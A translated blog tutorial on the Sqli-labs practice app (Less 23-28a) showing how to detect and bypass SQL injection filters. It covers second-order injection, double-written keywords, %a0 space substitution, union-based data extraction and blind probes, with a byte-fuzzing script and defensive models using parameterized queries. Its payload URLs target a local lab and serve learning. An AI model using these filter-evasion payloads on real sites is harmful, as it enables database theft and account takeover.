This article link: http://blog.csdn.net/u012763794/article/details/51457142
This time I'm back with the advanced injections (the Advanced Challenges), which are mostly about bypassing filters. For the basic challenges, see these two posts:
Lately I went off doing some reverse engineering (http://www.giantbranch.cn/myblog/?p=27), so this post dragged on far too long; I finished it today.
Learning SQL injection through Sqli-labs - Less 1-10 of the basic challenges
http://blog.csdn.net/u012763794/article/details/51207833
Learning SQL injection through Sqli-labs - Less 11-22 of the basic challenges
http://blog.csdn.net/u012763794/article/details/51361152
First of all, how do we determine what is being filtered? We have to look at each challenge before we can move on to the next step.
Less 23 GET - Error based - Strip comments (error-based, comments filtered, GET type)
First a single quote: error.
Add %23 (the URL encoding of #). For a GET request the # must be URL-encoded; for a POST submission this isn't necessary, see the previous two articles.
From this we can tell that the backend PHP replaces # with an empty string, because there is no gap between the two single quotes.
That doesn't work, so next try -- (the single-line comment). Note that we have to add a space or some other character after it for the single-line comment to take effect.
In the error here we only see the original statement's LIMIT in front of the single quote. Because we added a space, it is separated from the single quote we added; our single quote matched the previous one without error, and only a lone single quote is quoted. Comparing with Less 1, we know that -- is filtered and replaced with an empty string.
Here is the comparison without the space.
This is Less 1: only the trailing single quote produces the error, because the single quote after id='1' is separated from it by the --; the front single quotes are matched, so they don't show up in the error.
For Less 23 the judgment is more obvious: there is no gap between the two single quotes, so -- must have been replaced by an empty string.
Let's look at the source code; that is indeed the case.
So, to summarize how to judge comment filtering, and what error message each specific filter produces:
#: add a single quote, double quote, etc.
--: the same, add a single or double quote directly and then add -- with no space after it (when -- is used as a comment there has to be a space or another character after it, but that isn't necessary here, where we are only judging the filter).
So the only bypass is to close the quote ourselves; the multi-line comment is a different story.
Extracting the data and so on is just like Less 1 in the first of those two articles.
Less 24 - Second degree injections *Real treat* - Stored injections (second-order injection). Log in and have a look: it's a complete site with registration, login and password change. Looking at the root directory, there are indeed a lot of files.
After understanding the flow by registering and logging in, we audit each file. We can start from index.php, but the files that actually interact with the database are login_create.php, login.php and pass_change.php.
login.php (handles the login) filters the user and password.
login_create.php (handles new user creation):
// all three POST fields are escaped before they reach the INSERT
$username = mysql_escape_string($_POST['username']);
$pass     = mysql_escape_string($_POST['password']);
$re_pass  = mysql_escape_string($_POST['re_password']);
All three fields are filtered.
With pass_change.php we hit the jackpot.
When changing the password, the username is taken directly from the session without any filtering, so once my username contains a comment sequence I can change someone else's password.
So we just create a special new user and then change the password.
Below is the example against admin (account: admin'-- password: asdf).
After registering, check whether it's in the database.
So the username was not treated as a comment; it was stored whole. We log in and change the password; to make the effect easier to see, I added a line to the PHP that prints the SQL statement.
Look at the database: it really was changed.
Some may ask: wasn't the single quote filtered at registration time?
Yes, our admin'-- became admin\'--.
That makes the single quotes on the left and right of admin\'-- match correctly, but what is stored in the database is still a plain single quote (the escaping only temporarily strips the quote of its effect here; it still represents a single quote).
Of course, for the new user here
admin'# also works.
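To make the second-order flaw concrete, here is an added example of mine (not the lab's code) that models pass_change.php with an in-memory SQLite database: registration stores the literal username admin'-- (which is exactly what the escaping on the INSERT achieves), and the password-change query is shown both as the vulnerable string concatenation and with bound parameters. It assumes SQLite in place of MySQL, which makes no difference to the comment-based trick.

```python
import sqlite3

def setup_db():
    # Constructed stand-in for the lab's users table.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'secret')")
    # login_create.php escapes the quote on the way in, so the INSERT succeeds and the
    # stored value is the literal admin'--. A placeholder stores exactly the same value.
    db.execute("INSERT INTO users VALUES (?, ?)", ("admin'--", "asdf"))
    return db

def change_password_vulnerable(db, session_user, old_pw, new_pw):
    # What pass_change.php does: the username comes straight from the session and is
    # concatenated into the UPDATE unescaped, so the stored quote becomes live again and
    # the -- comments out the password check. Returns the number of rows changed.
    sql = ("UPDATE users SET password='%s' WHERE username='%s' AND password='%s'"
           % (new_pw, session_user, old_pw))
    return db.execute(sql).rowcount

def change_password_fixed(db, session_user, old_pw, new_pw):
    # Hardened form: bound parameters, so a session value can never change the query shape.
    sql = "UPDATE users SET password=? WHERE username=? AND password=?"
    return db.execute(sql, (new_pw, session_user, old_pw)).rowcount

def password_of(db, username):
    row = db.execute("SELECT password FROM users WHERE username=?", (username,)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    # Logged in as admin'-- with a wrong old password: admin's row is the one updated.
    db = setup_db()
    print(change_password_vulnerable(db, "admin'--", "wrong", "pwned"), password_of(db, "admin"))
    # Same request against the fixed query: nothing matches, admin is untouched.
    db = setup_db()
    print(change_password_fixed(db, "admin'--", "wrong", "pwned"), password_of(db, "admin"))
```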
Less 25 - Trick with OR & AND (or and and filtered)
Confirm single-quote string injection: http://localhost/sqli-labs/Less-25/?id=1'
To judge that or is filtered, compare the error with Less 1: http://localhost/sqli-labs/Less-25/?id=1'or1
Screenshots: the first is Less 1, the second is Less 25.
Similarly, judge that and is filtered: http://localhost/sqli-labs/Less-25/?id=1'and1
Looking at the source again, the match uses the i modifier, so changing case won't help. We can inject using the symbol forms of or and and instead.
Use &&, URL-encoded as %26%26, to get it to the backend.
And, of course, the double-write bypass:
http://localhost/sqli-labs/Less-25/?id=1' oorr '1'='1
http://localhost/sqli-labs/Less-25/?id=1' anandd '1'='1
Less 25a - Trick with OR & AND Blind (blind, or and and filtered). So how do we judge in the blind case whether and and or are filtered? Just add or / and directly, as before.
The code for this one is the same as above, but here the error output is suppressed, so we can only judge from the page.
Less 26 - Trick with comments and space (injection with comments and spaces filtered)
Confirm # is filtered: http://localhost/sqli-labs/Less-26/?id=%231
Confirm or is filtered: http://localhost/sqli-labs/Less-26/?id=or1
Confirm the multi-line comment is filtered: http://localhost/sqli-labs/Less-26/?id=/*1
Confirm the single-line comment is filtered: http://localhost/sqli-labs/Less-26/
Confirm the slash is filtered: http://localhost/sqli-labs/Less-26/?id=/1
Confirm the backslash is filtered: http://localhost/sqli-labs/Less-26/?id=1
Confirm the space is filtered; error-based injection just works: http://localhost/sqli-labs/Less-26/?id=1 "
Really tiring. Below I look at the source to confirm; even with the source, confirming what is filtered is still pretty tiring.
Next, look at how to get around it, and at how hard that is; this time let's extract the complete data. We usually bypass a space filter with the multi-line comment /**/, but here that is filtered, so it doesn't work. Then try the wide-byte trick to see whether it can replace the space, and it turns out it can. Beyond that there is nothing else to do but write a script that runs through the bytes and find out (a bit of a pity..., but still something).
The script is as follows:
# -*- coding: utf8 -*-
"""
@version:
@author: giantbranch
@file: testsqli.py
@time: 2016/5/29 23:14
"""
# ported from the original Python 2 (xrange / print statement) to Python 3
import requests


def change_to_hex(num):
    # turn a byte value into its URL-encoded form, e.g. 9 -> "%09", 160 -> "%a0"
    tmp = hex(num).replace("0x", "")
    if len(tmp) < 2:
        tmp = "0" + tmp
    return "%" + tmp


req = requests.Session()
for i in range(0, 256):
    enc = change_to_hex(i)
    # try the candidate byte as the separator on both sides of &&: id=1<b>&&<b>'1'='1
    url = "http://localhost/sqli-labs/Less-26/?id=1" + enc + "%26%26" + enc + "'1'='1"
    ret = req.get(url)
    if "Dumb" in ret.text:
        print("Good, this can use: " + enc)
Run results:
I picked the first one, 0x09, to look at, and found that apart from %a0 nothing else can replace the space, a bit sad. In fact, apart from %a0, the hits are basically the filtered characters themselves: %20 (space), %23 (pound), %2a (asterisk), %2d (minus), %2f (slash), %5c (backslash); as for %09-%0d, those are tab, line feed, form feed and so on, which also count as whitespace. So this also reveals what the program filters; no payload is universal, you still have to test in practice, and with a small modification this script could work out what a program filters.
So we can use %a0 instead of the space.
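Why the byte scan above finds only %a0, and why the double-written oorr / anandd of Less 25 get through, is easier to see offline. The following is an added example of mine (not the lab's code): it rebuilds the Less 26 blacklist in Python from the filters identified in this post (or, and, /*, --, #, whitespace and slashes, each stripped once, with or/and case-insensitive; assumed to mirror the lab's chain of preg_replace calls) and runs candidate inputs through it, including the same probe string the scan script sends.

```python
import re

# Model of the Less 26 blacklist as described above (assumption: one pass per pattern,
# in this order, like a chain of preg_replace calls). Patterns are bytes so that \s
# behaves like PCRE without the /u flag: ASCII whitespace only, never 0xA0.
BLACKLIST = [
    (re.compile(rb"or", re.IGNORECASE), b""),
    (re.compile(rb"and", re.IGNORECASE), b""),
    (re.compile(rb"[/*]"), b""),   # /* ... */
    (re.compile(rb"-"), b""),      # --
    (re.compile(rb"#"), b""),
    (re.compile(rb"\s"), b""),     # space, \t, \n, \v, \f, \r
    (re.compile(rb"[/\\]"), b""),  # slash and backslash
]

def blacklist(payload: bytes) -> bytes:
    for pattern, replacement in BLACKLIST:
        payload = pattern.sub(replacement, payload)
    return payload

def stripped_bytes() -> list:
    # Which single bytes does the filter delete outright? This is the offline
    # counterpart of the scan; these are the %xx values the post lists as "hits".
    return [b for b in range(256) if blacklist(bytes([b])) == b""]

def probe(b: int) -> bool:
    # The same string the scan script sends, id=1<b>&&<b>'1'='1. True when it reaches
    # the query unchanged, i.e. the byte is not stripped; whether MySQL then accepts it
    # as a token separator is what the live run answered (only 0xA0 did).
    sep = bytes([b])
    payload = b"1" + sep + b"&&" + sep + b"'1'='1"
    return blacklist(payload) == payload

if __name__ == "__main__":
    print(blacklist(b"1' oorr '1'='1"))        # one-pass removal rebuilds "or"
    print(blacklist(b"infoorrmation_schema"))  # "information" itself contains "or"
    print(blacklist(b"password"))              # the filter mangles legitimate input too
    print([hex(b) for b in stripped_bytes()])
    print(probe(0x20), probe(0x09), probe(0xA0))
```

The last two prints are the defender's takeaway: a substring blacklist both lets double-written keywords back through and breaks honest values like "password", so the fix is a parameterized query, not a longer list.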
Full payloads:
Confirm the number of fields:
http://localhost/sqli-labs/Less-26/?id=0%27union%a0select%a01,2,3,4%a0%26%26%a0%271%27=%271
http://localhost/sqli-labs/Less-26/?id=0%27union%a0select%a01,2,3%a0%26%26%a0%271%27=%271
Get the database currently in use:
http://localhost/sqli-labs/Less-26/?id=0%27union%a0select%a01,database(),3%a0%26%26%a0%271%27=%271
Get the table information:
http://localhost/sqli-labs/Less-26/?id=0%27union%a0select%a01,group_concat(table_name),3%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema='security'%26%26%a0%271%27=%271
Get the column information:
http://localhost/sqli-labs/Less-26/?id=0%27union%a0select%a01,group_concat(column_name),3%a0from%a0infoorrmation_schema.columns%a0where%a0table_schema='security'%a0anandd%a0table_name='emails'%26%26%a0%271%27=%271
Finally get the data; this one turned out not to extract:
http://localhost/sqli-labs/Less-26/?id=0%27%a0union%a0select%a01,email_id,3%a0from%a0emails%26%26%a0%271%27=%271
Why can the table and column names be extracted but not the data? The error had me at a loss. I'll put this aside for now and move on to the next lesson; if you know, tell me.
Update 6.1: I finally know how to extract the data; the syntax above was indeed wrong. Here are two that work:
http://localhost/sqli-labs/Less-26/?id=0%27%a0union%a0select%a01,group_concat(email_id),3%a0from%a0emails%a0union%a0select(1),2,'3
http://localhost/sqli-labs/Less-26/?id=0%27%a0union%a0select%a01,group_concat(email_id),3%a0from%a0emails%a0where%a0%271%27=%271
Less 26a - GET - Blind based - All your SPACES and COMMENTS belong to us (blind, spaces and comments filtered)
This is similar to the above, but no error is shown, so deciding what is filtered goes basically as above, here according to whether the returned page has data or not.
But there is another question: how do we tell whether the input was filtered or forced to an integer? One picture makes it clear.
As you can see, because the first character is not a digit, intval converts it directly to 0, whereas when it is filtered, id=#1 is just the normal id=1.
Less 27 - GET - Error based - All your UNION & SELECT belong to us (union and select filtered)
The old routine: judge that it is the single-quote string type.
http://localhost/sqli-labs/Less-27/?id=1'
We find that spaces are filtered too.
The specific judgments are almost the same as in 26. For union and select, see the judgment below; then test whether double-writing or changing case gets through.
http://localhost/sqli-labs/Less-27/?id=select1
http://localhost/sqli-labs/Less-27/?id=union1
Let's look at the filter: multi-line comments, single-line comments, spaces, and union and select in several cases.
Straight to the payloads:
Dump the current database:
http://localhost/sqli-labs/Less-27/?id='%a0union%a0select(1),(database()),(3)or(1)='1
Tables:
http://localhost/sqli-labs/Less-27/?id='%a0union%a0select(1),(group_concat(table_name)),(3)%a0from%a0information_schema.tables%a0where%a0table_schema='security'%26%26%a0%271%27=%271
Columns:
http://localhost/sqli-labs/Less-27/?id='%a0union%a0select(1),group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_schema='security'%a0%26%26%a0table_name='emails'%26%26%a0%271%27=%271
Extract the data:
http://localhost/sqli-labs/Less-27/?id='%a0union%a0select(1),group_concat(email_id),3%a0from%a0emails%a0union%a0select(1),2,'3
Less 27a - GET - Blind based - All your UNION & SELECT belong to us
This is the blind version of Less 27, double-quote string type.
http://localhost/sqli-labs/Less-27a/?id=1"or"1"="1
Here is the blind payload:
Judge the length of the database name; it's really just slightly reshaped, no different in principle from the earlier blind injections.
Less 28 - GET - Error based - All your UNION & SELECT belong to us - String - Single quote with parenthesis (error-based, single quote with parentheses string type, bypassing the filtering of union, select and so on)
Just look at the code, because it's similar to the lessons above.
That i is the modifier on the pattern being matched: i means ignore case, and \s matches any whitespace character (tab, newline, space, etc.), so we can bypass it by not putting a real space in the middle.
Let's just use %a0.
Finally, the payload for extracting the data:
http://localhost/sqli-labs/Less-28/?id=0%27)%a0union%a0select%a01,group_concat(email_id),3%a0from%a0emails%a0where%a0(%271%27=%271
Less 28a - GET - Blind based - All your UNION & SELECT belong to us - String - Single quote with parenthesis (blind, single quote with parentheses string type, bypassing the filtering of union, select and so on)
The author has commented out the filter at the front, so let's uncomment it, otherwise there is no challenge.
This is the last blind one; with the basics covered there is not much more to say.
Since this is the last lesson, here are concrete payloads: dump the database name, first its length, then each character; knowing the length tells you how many times to repeat.
Length is 8:
http://localhost/sqli-labs/Less-28a/?id=1')and(length(database())>7)and('1')=('1
http://localhost/sqli-labs/Less-28a/?id=1')and(length(database())>8)and('1')=('1
The first character is 115, i.e. s:
http://localhost/sqli-labs/Less-28a/?id=1')and(ascii(substr((select%a0database())))>114)and('1')=('1
http://localhost/sqli-labs/Less-28a/?id=1')and(ascii(substr((select%a0database())))>115)and('1')=('1
OK, next time I'll continue with challenges 29-38, keep going!!! And I look forward to your encouragement below to speed up the progress.
Learning SQL injection through Sqli-labs - Less 23-28a of the advanced challenges